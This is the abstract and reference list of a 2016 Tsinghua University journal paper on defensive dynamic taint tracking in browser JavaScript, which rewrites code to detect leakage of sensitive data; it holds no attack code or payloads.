Abstract:The rapid development of the web has led to increasing use of JavaScript, especially in websites requiring rapid responses between the web server and the client, which has led to many security problems. This paper presents a dynamic taint tracking method based on a revised JavaScript code. The revised code can mark and track sensitive data transmission paths during JavaScript execution and warn the user of possible leakage of the marked sensitive data. This implementation is independent of the JavaScript engine and can be used in a variety of browsers. Tests show that this method can effectively track sensitive data and detect abnormal behavior.
王伟平, 柏军洋, 张玉婵, 王建新. 基于代码改写的JavaScript动态污点跟踪[J]. 清华大学学报(自然科学版), 2016, 56(9): 956-962,968.
WANG Weiping, BAI Junyang, ZHANG Yuchan, WANG Jianxin. Dynamic taint tracking in JavaScript using revised code. Journal of Tsinghua University(Science and Technology), 2016, 56(9): 956-962,968.
[1] OWASP. Cross-site scripting (XSS).(2014-04-22).[2015-04-07]. https://www.owasp.org/index.php/XSS.
[2] Meyerovich L A, Livshits B. Conscript: Specifying and enforcing fine-grained security policies for JavaScript in the browser [C]//Proceedings of the 31st IEEE Symposium on Security and Privacy (SP). Piscataway, NJ, USA: IEEE Press, 2010: 481-496.
[3] Weinberger J, Barth A, Song D. Towards client-side HTML security policies [C]//Proceedings of the 6th USENIX Conference on Hot Topics in Security. Berkeley, CA, USA: USENIX Association, 2011.
[4] Saxena P, Molnar D, Livshits B. SCRIPTGARD: Automatic context-sensitive sanitization for large-scale legacy web applications [C]//Proceedings of the 18th ACM Conference on Computer and Communications Security. New York, NY, USA: ACM, 2011: 601-614.
[5] Vogt P, Nentwich F, Jovanovic N, et al. Cross site scripting prevention with dynamic data tainting and static analysis [C]//Proceedings of the 14th Annual Network and Distributed System Security Symposium. San Diego, CA, USA: Internet Society, 2007.
[6] Minded Security. DOMinatorPro: Securing next generation of Web applications. (2012-09-30).[2015-04-07]. https://dominator.mindedsecurity.com.
[7] Lekies S, Stock B, Johns M. 25 million flows later: Large-scale detection of DOM-based XSS [C]//Proceedings of the 20th ACM Conference on Computer and Communications Security. New York, NY, USA: ACM, 2013: 1193-1204.
[8] Saxena P, Hanna S, Poosankam P, et al. FLAX: Systematic discovery of client-side validation vulnerabilities in rich Web applications [C]//Proceedings of the 17th Annual Network and Distributed System Security Symposium. San Diego, CA, USA: Internet Society, 2010.
[9] Phung P H, Sands D, Chudnov A. Lightweight self- protecting JavaScript [C]//Proceedings of the 4th International Symposium on Information, Computer, and Communications Security. New York, NY, USA: ACM, 2009: 47-60.
[10] International Secure Systems Lab. NoMoXSS. (2006-3-29).[2015-04-07]. http://seclab.tuwien.ac.at/projects/jstaint/files/testing.zi